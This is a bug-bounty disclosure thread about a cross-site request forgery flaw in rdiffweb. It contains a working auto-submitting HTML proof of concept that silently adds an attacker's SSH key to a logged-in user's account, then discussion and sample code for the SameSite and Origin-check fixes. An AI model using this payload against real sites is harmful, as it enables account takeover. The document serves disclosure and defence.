Cross-Site Request Forgery (CSRF) in ikus060/rdiffweb

Valid

Reported on

Sep 11th 2021


✍️ Description

Hello dear Rdiffweb team.

I found a CSRF vulnerability on the following endpoint that allows attackers to create an SSH key with PoC.html.

🕵️‍♂️ Proof of Concept

  1. A user with the right privileges should be logged in, in Firefox or Safari.

  2. The user goes to a website that contains PoC.html.

  3. After visiting the attacker's website, an SSH key named bob@thinkpad-t530 will be created.

PoC.html:

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://rdiffweb-demo.ikus-soft.com/prefs/sshkeys" method="POST">
      <input type="hidden" name="action" value="add" />
      <input type="hidden" name="title" value="bob&#64;thinkpad&#45;t530&#32;" />
      <input type="hidden" name="key" value="ssh&#45;rsa&#13;&#10;MIICXAIBAAKBgQCpPefILQKzndiaxLp6M9&#43;AlfZv&#47;UahWXRrZgrGJb8kT8yeCa9U&#13;&#10;zqtsOlWi58Akp1U3TxMdizqLKA9ivrAFXNc&#47;U&#47;HkqeB73GIprPvYkiL&#43;&#43;UxpJQKL&#13;&#10;bY2ybZK1&#43;I5mWiaGhNec3KSvaTRKXQZpCYnKNM8smlLPc85a3MZs0&#47;iIKQIDAQAB&#13;&#10;AoGAcf3eVjfq7&#43;xLbsM&#47;DvxNeCCJ4phnsFm&#43;TnBmpVvbSKvvGCtRyv&#43;A&#43;t63u4f5&#13;&#10;JTcH8L70ExwqDHypEEt758DGwSa&#43;p7yfxYYNLcmTfjI&#43;Hiqc05WpouwDcCeFvWwH&#13;&#10;Hrcg&#47;&#43;bbcY17G9PPn54Gcl5LUd0bNFd8hBwzdoKf0OdkX7kCQQD05SMnQNZxdgTG&#13;&#10;4BHK1J&#43;Uh2HNDruk6TilPyejPGlGKU72Y&#47;Awt2GQv0ejHIYJznkDgQ2ic3q3yvzX&#13;&#10;SKZsWvM7AkEAsOqMQIwf0nw3I7zgFsTCsw6Bu46Sot&#47;Qm0bZhNaDfyRGt5LodW5t&#13;&#10;aZkBZPZyMe8GNvKY1Y7KVPKRYYndJKuz6wJBAOTdS1gA2SfZ8qblettCkAxf5T&#43;c&#13;&#10;&#43;DIrHxwXhHSiHYRLUJclWLA&#43;gPikOk&#43;udXmusxtaPSLHpzUih96t75IuAUcCQHy8&#13;&#10;MjzETx95ourYnWqQOfJDFScnI64gfZUtQ&#43;oL0NTQv&#43;dodett&#43;0iLr1b&#47;B467Rzdw&#13;&#10;nl9b&#43;L4h9Gy&#47;5iKXyRcCQCoyLH3foTFcEigySYkgdfdGv9LpWDPb9y0c2pbGJDcr&#13;&#10;6moUZy5AQ3r4oJmpYoJQWpzUKk5FGTBkSnHo917J9Mg&#61;" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

Also, an attacker can send multiple requests with the help of iframes.

Fix

I just want to suggest that you set a CSRF token for this form.

Ziding Zhang
3 months ago

Admin


Hey amammad, I've opened a PR on the repo asking for a security policy with email.

amammad
2 months ago

Researcher


@admin hey admin

They already put their email in 25 days ago!!!

We have contacted a member of the ikus060/rdiffweb team and are waiting to hear back 2 months ago
Jamie Slome
2 months ago

Admin


Sorted! ♥️

Patrik Dufresne validated this vulnerability 2 months ago
amammad has been awarded the disclosure bounty
The fix bounty is now up for grabs
Patrik Dufresne confirmed that a fix has been merged on fc257f 2 months ago
The fix bounty has been dropped
Patrik Dufresne
2 months ago

Maintainer


Changes are made and released as 2.3.5.

Patrik Dufresne
a month ago

Maintainer


@amammad

I'm working on a different implementation because adding a CSRF token in every form breaks a few integrations for my customers. That said, I'm working on another mitigation to validate the Origin and Referer. That should cover all endpoints and future endpoints too.

Any thoughts on the subject?
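The Origin/Referer check the maintainer describes above, written as an added framework-agnostic example (not rdiffweb's own code). A browser always attaches an Origin header to a cross-origin form submission like the PoC, and usually a Referer; the `history.pushState('', '', '/')` trick in the PoC only shortens the Referer path, it cannot change its origin. The function rejects state-changing requests whose Origin (or, failing that, Referer) is not one of the application's own origins, and also rejects requests that carry neither. The `allowed_origins` configuration value and the constructed header dicts are assumptions for the example.

```python
"""Origin/Referer validation for state-changing requests.

Added example, not rdiffweb's own code. A server runs this before handling
POST/PUT/PATCH/DELETE. Browsers attach an Origin header to cross-origin form
posts (and a Referer unless the page suppresses it), so a request whose
declared origin is not the application's own is rejected.
"""
from urllib.parse import urlsplit

SAFE_METHODS = frozenset({"GET", "HEAD", "OPTIONS", "TRACE"})


def _origin_of(url):
    """Return 'scheme://host[:port]' (lower-cased) for a URL, or None if unparsable."""
    parts = urlsplit(url)
    if not parts.scheme or not parts.netloc:
        return None
    return f"{parts.scheme.lower()}://{parts.netloc.lower()}"


def is_trusted_request(method, headers, allowed_origins):
    """Return True if the request may be allowed to change state.

    method: HTTP method string.
    headers: dict of request headers (looked up case-insensitively here).
    allowed_origins: iterable of 'scheme://host[:port]' the app is served from
    (hypothetical configuration value; a real deployment would derive it from
    its own Host / reverse-proxy handling).
    """
    if method.upper() in SAFE_METHODS:
        return True  # safe methods must not change state, so nothing to protect
    h = {k.lower(): v for k, v in headers.items()}
    allowed = {o.lower().rstrip("/") for o in allowed_origins}

    origin = h.get("origin")
    if origin is not None:
        # 'null' is sent for sandboxed iframes, data: URLs and some redirect chains:
        # it never matches a real origin, so it is rejected by the set lookup.
        return origin.lower().rstrip("/") in allowed

    referer = h.get("referer")
    if referer is not None:
        ref_origin = _origin_of(referer)
        return ref_origin is not None and ref_origin in allowed

    # Neither header: a browser form post always sends Origin, so treat as forged.
    return False


# Constructed sample requests (not captured traffic).
APP_ORIGINS = ["https://rdiffweb-demo.ikus-soft.com"]
POC_POST_HEADERS = {"Origin": "https://evil.example", "Referer": "https://evil.example/"}
LEGIT_POST_HEADERS = {"Origin": "https://rdiffweb-demo.ikus-soft.com",
                      "Referer": "https://rdiffweb-demo.ikus-soft.com/prefs/sshkeys"}


def demo():
    """Return the decisions for the PoC's forged POST and a genuine same-origin POST."""
    return (is_trusted_request("POST", POC_POST_HEADERS, APP_ORIGINS),
            is_trusted_request("POST", LEGIT_POST_HEADERS, APP_ORIGINS))


if __name__ == "__main__":
    print(demo())
```

One caveat for the integrations the maintainer mentions: non-browser clients (scripts, curl) send neither Origin nor Referer and would be rejected by this check, so such clients need a non-cookie credential that is exempted from it; that exemption is not shown here.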

amammad
a month ago

Researcher


first option:

You can set the SameSite attribute to Strict for all cookies, but I heard that this can cause some problems; I don't know what kind of problems.

second option:

You can also set the SameSite attribute to Lax for all cookies, which is an appropriate option. But besides Lax, you should only accept requests with the HTTP POST method and use the GET method only when clients want to receive information, not change it.

With these two options you can have protection against CSRF.

amammad
a month ago

Researcher


In my opinion, checking the Origin header is a non-standard and old implementation; as we have the SameSite attribute for cookies, there isn't a need to implement something else.

I think you can read about Strict SameSite, and then, if you don't find any problem, this can be the easiest fix.
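The two SameSite comments above (Strict vs. Lax, and why Lax must be paired with POST-only state changes) are modelled in this added example, which is not rdiffweb's or the researcher's code. It reproduces the browser-side rule for attaching a cookie to a request and applies it to the PoC's cross-site form POST, to a cross-site link click (a top-level GET navigation) and to a GET loaded inside an iframe. The site comparison is simplified to the last two DNS labels (an assumption; real browsers use the public-suffix list), and the host names are constructed for the example.

```python
"""How the SameSite attribute decides whether a session cookie rides along.

Added example, not rdiffweb's own code. The PoC works because the browser
attaches the victim's session cookie to the attacker's cross-site POST;
SameSite=Lax or Strict stops that, but Lax still sends the cookie on
top-level GET navigations, so GET endpoints must not change state.
"""


def site_of(host):
    """Registrable domain (simplified: last two DNS labels, lower-cased)."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def cookie_is_sent(samesite, initiator_host, target_host, method, top_level_navigation):
    """Return True if a cookie with the given SameSite value is attached.

    samesite: 'Strict', 'Lax', 'None', or None when the attribute is absent
    (treated here as the legacy 'send everywhere' behaviour; Chrome 80+ instead
    defaults to Lax, which is why the PoC targets Firefox or Safari).
    """
    same_site = site_of(initiator_host) == site_of(target_host)
    if same_site:
        return True  # same-site requests always carry the cookie
    mode = (samesite or "None").capitalize()
    if mode == "Strict":
        return False  # never on a cross-site request, not even a link click
    if mode == "Lax":
        # Only top-level navigations with a safe method (GET/HEAD) carry Lax cookies.
        return top_level_navigation and method.upper() in ("GET", "HEAD")
    return True  # SameSite=None (must also be Secure): sent on every cross-site request


def poc_outcomes(samesite):
    """Whether the rdiffweb session cookie would accompany three cross-site requests.

    Hosts are constructed for the example: the attacker page on evil.example,
    the target on rdiffweb-demo.ikus-soft.com.
    """
    attacker, target = "evil.example", "rdiffweb-demo.ikus-soft.com"
    return {
        "form_post": cookie_is_sent(samesite, attacker, target, "POST", True),  # the PoC
        "link_get": cookie_is_sent(samesite, attacker, target, "GET", True),    # link click
        "iframe_get": cookie_is_sent(samesite, attacker, target, "GET", False),  # iframe load
    }


if __name__ == "__main__":
    for mode in (None, "Lax", "Strict"):
        print(mode, poc_outcomes(mode))
```

With Lax the PoC's form POST loses the cookie, but a link to a state-changing GET URL would still carry it; that is the reason the researcher pairs Lax with "only accept POST for changes". Strict also blocks the link click, at the cost of dropping the session on every cross-site arrival, which is the kind of problem the researcher mentions hearing about.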

Patrik Dufresne
a month ago

Maintainer


@amammad

I'm glad you talked about SameSite=Lax; I also added this functionality yesterday. I will complete the changes by adding unit tests for all of this, and it should be good.

Thanks !

amammad
a month ago

Researcher


You're welcome, happy to hear about the fixes.

amammad
a month ago

Researcher


When you finish the tests and release a new version, you can put a comment here, and if I find more CSRF issues I will report them via Huntr.

Patrik Dufresne
a month ago

Maintainer


Changes are completed and released in rdiffweb 2.3.7.